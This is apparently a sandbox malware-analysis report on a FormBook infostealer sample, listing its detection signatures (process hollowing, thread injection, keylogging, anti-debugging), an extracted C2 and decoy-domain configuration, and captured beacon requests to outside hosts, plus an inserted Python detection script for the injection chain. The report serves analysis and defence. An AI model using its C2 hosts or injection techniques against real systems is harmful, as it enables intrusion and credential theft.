Windows Analysis Report
shedfam.exe

Overview

General Information

Sample Name: shedfam.exe
Analysis ID: 756041
MD5: c0a85d86855b257b25572aa7d9d90381
SHA1: ea5ce824d225c0df297586a2c6621aea5ab8584b
SHA256: c9cf9f0fa6980019aa3a93b9b25ca2cf14cfad4b4afef12d43a20ece34d2093b
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
OS version to string mapping found (often used in BOTs)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Found evasive API chain (may stop execution after accessing registry keys)
Contains functionality to simulate mouse events
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
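Read together, the signatures above and the Networking entries further down describe one chain: the NSIS installer shedfam.exe drops kmhbvf.exe into the user's Temp directory, kmhbvf.exe launches a second copy of itself in suspended mode and hollows it (the FormBook Yara rules already match at 0x400000 of process 2 at start-up), explorer.exe is then injected and is the process that spawns NETSTAT.EXE and opens the HTTP connections. The following Python is an added example, not part of the Joe Sandbox report, that encodes that chain as a handful of process-tree rules and runs them over a constructed Sysmon-style event list. PIDs use the sandbox's own process indices (0, 1, 2, 3, 13); the parent/child links for processes 1 and 2, the watchlist of console tools, and the Temp-path heuristic are my assumptions, not fields the report prints.

```python
"""Process-tree rules for the drop / hollow / inject / netstat chain in this report."""
import ntpath

# Constructed Sysmon-style events reproducing the chain in the report. PIDs are the
# sandbox's process indices; the ppid links for pids 1 and 2 are inferred (see lead-in).
EVENTS = [
    {"type": "process_create", "pid": 0, "ppid": None,
     "image": r"C:\Users\user\Desktop\shedfam.exe"},
    {"type": "process_create", "pid": 1, "ppid": 0,
     "image": r"C:\Users\user\AppData\Local\Temp\kmhbvf.exe"},
    {"type": "process_create", "pid": 2, "ppid": 1,        # suspended copy, later hollowed
     "image": r"C:\Users\user\AppData\Local\Temp\kmhbvf.exe"},
    {"type": "process_create", "pid": 3, "ppid": None,     # already running; injection target
     "image": r"C:\Windows\explorer.exe"},
    {"type": "process_create", "pid": 13, "ppid": 3,
     "image": r"C:\Windows\SysWOW64\NETSTAT.EXE"},
    {"type": "dns_query", "pid": 3, "image": r"C:\Windows\explorer.exe",
     "query": "www.111lll.xyz"},
    {"type": "network_connect", "pid": 3, "image": r"C:\Windows\explorer.exe",
     "dst": "18.167.242.213", "port": 80},
    {"type": "network_connect", "pid": 3, "image": r"C:\Windows\explorer.exe",
     "dst": "103.100.63.146", "port": 80},
]

# ASSUMED watchlist of console tools that explorer.exe has no reason to launch without a
# visible console; netstat.exe is the one this sample uses. Extend to taste.
WATCHED_CHILDREN = {"netstat.exe"}
USER_TEMP = "\\appdata\\local\\temp\\"


def _name(image):
    return ntpath.basename(image).lower()


def _in_user_temp(image):
    return USER_TEMP in image.lower()


def build_process_table(events):
    """pid -> process_create event, so each child can be matched to its parent."""
    return {e["pid"]: e for e in events if e["type"] == "process_create"}


def detect(events):
    procs = build_process_table(events)
    findings = []

    def add(rule, pid, **detail):
        findings.append({"rule": rule, "pid": pid, **detail})

    for e in events:
        if e["type"] == "process_create":
            parent = procs.get(e["ppid"])
            if parent is None:
                continue
            if _name(parent["image"]) == "explorer.exe" and _name(e["image"]) in WATCHED_CHILDREN:
                add("explorer_spawns_system_tool", e["pid"], parent_pid=parent["pid"], image=e["image"])
            if e["image"].lower() == parent["image"].lower() and _in_user_temp(e["image"]):
                # The same binary re-launching itself from %Temp%: the visible shape of a
                # create-suspended + hollow step (the suspended flag itself is not logged).
                add("self_spawn_from_user_temp", e["pid"], parent_pid=parent["pid"], image=e["image"])
            if _in_user_temp(e["image"]) and not _in_user_temp(parent["image"]):
                add("exec_dropped_temp_binary", e["pid"], parent_pid=parent["pid"], image=e["image"])
        elif e["type"] == "network_connect" and _name(e["image"]) == "explorer.exe":
            add("shell_process_outbound_connect", e["pid"], dst=f'{e["dst"]}:{e["port"]}')
    return findings


def injected_shell_pids(findings):
    """explorer.exe instances that both spawned a watched tool and connected out: the
    combination that marks an injected host process rather than a user launching a tool."""
    spawned = {f["parent_pid"] for f in findings if f["rule"] == "explorer_spawns_system_tool"}
    connected = {f["pid"] for f in findings if f["rule"] == "shell_process_outbound_connect"}
    return spawned & connected


if __name__ == "__main__":
    hits = detect(EVENTS)
    for h in hits:
        print(h)
    print("injected shell pids:", injected_shell_pids(hits))
```

On a real endpoint feed, the single-rule hits are noisy on their own (a user can run netstat from a shortcut, and explorer.exe does talk to the network for some shell features); the point of injected_shell_pids is that the report's sample trips both rules from the same explorer.exe instance, which is the combination worth paging on.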

AV Detection

Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Joe Sandbox ML: detected
Source: 2.0.kmhbvf.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.kmhbvf.exe.3b00000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.kmhbvf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook
{
  "C2 list": ["www.justbeand.com/sk19/"],
  "decoy": [
    "21diasdegratitud.com", "kx1993.com", "chasergt.com", "837news.com",
    "naturagent.co.uk", "gatorinsurtech.com", "iyaboolashilesblog.africa", "jamtanganmurah.online",
    "gguminsa.com", "lilliesdrop.com", "lenvera.com", "link48.co.uk",
    "azinos777.fun", "lgcdct.cfd", "bg-gobtc.com", "livecarrer.uk",
    "cbq4u.com", "imalreadygone.com", "wabeng.africa", "jxmheiyouyuetot.tokyo",
    "atrikvde.xyz", "ceopxb.com", "autovincert.com", "18traversplace.com",
    "internetmedianews.com", "entersight.net", "guzmanshandymanservicesllc.com", "gqqwdz.com",
    "emeraldpathjewelery.com", "flowmoneycode.online", "gaziantepmedicalpointanket.com", "111lll.xyz",
    "irkwood138.site", "abovegross.com", "shopabeee.co.uk", "greenvalleyfoodusa.com",
    "dd-canada.com", "libertysminings.com", "baronsaccommodation.co.uk", "kareto.buzz",
    "freeexercisecoalition.com", "73129.vip", "avanteventexperiences.com", "comercialdiabens.fun",
    "nondescript.uk", "facal.dev", "detox-71934.com", "kovar.club",
    "jetsparking.com", "infocuspublicidad.com", "xxhcom.com", "indianvoltage.com",
    "becrownedllc.com", "3744palosverdes.com", "gospelnative.africa", "linkmastermind.com",
    "cotgfp.com", "lousweigman.com", "cantoaffine.online", "debbiepatrickdesigns.com",
    "766626.com", "webcubemedia.africa", "autonomaat.com", "hannahmarsh.co.uk"
  ]
}
Source: shedfam.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00F34005
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00F3C2FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00F3494A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00F3CD9F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3CD14 FindFirstFileW,FindClose, 1_2_00F3CD14
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00F3F5D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00F3F735
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00F3FA36
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00F33CE2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 4x nop then pop esi 2_2_004172FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 4x nop then pop esi 2_2_004172B6

Networking

Source: C:\Windows\explorer.exe Network Connect: 18.167.242.213 80
Source: C:\Windows\explorer.exe Network Connect: 103.100.63.146 80
Source: C:\Windows\explorer.exe Domain query: www.111lll.xyz
Source: C:\Windows\explorer.exe Domain query: www.73129.vip
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\explorer.exe DNS query: www.111lll.xyz
Source: Malware configuration extractor URLs: www.justbeand.com/sk19/
Source: global traffic HTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1
  Host: www.111lll.xyz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1
  Host: www.73129.vip
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: YISUCLOUDLTD-AS-APYISUCLOUDLTDHK YISUCLOUDLTD-AS-APYISUCLOUDLTDHK
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: NETSTAT.EXE, 0000000D.00000002.518369394.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://gcsahrz23.xyz/
Source: shedfam.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: shedfam.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.252060134.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000000.294072289.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.305847313.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.257903286.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333339547.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.280708898.000000000F276000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: kmhbvf.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown DNS traffic detected: queries for: www.111lll.xyz
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 1_2_00F429BA
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Tue, 29 Nov 2022 14:13:30 GMT
  Content-Type: text/html
  Content-Length: 146
  Connection: close
  Server: Cheertech CDN
  X-Cache-Status: MISS
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 1_2_00F30508
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405125
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_00F44632
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_00F5D164
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 2_2_00F5D164
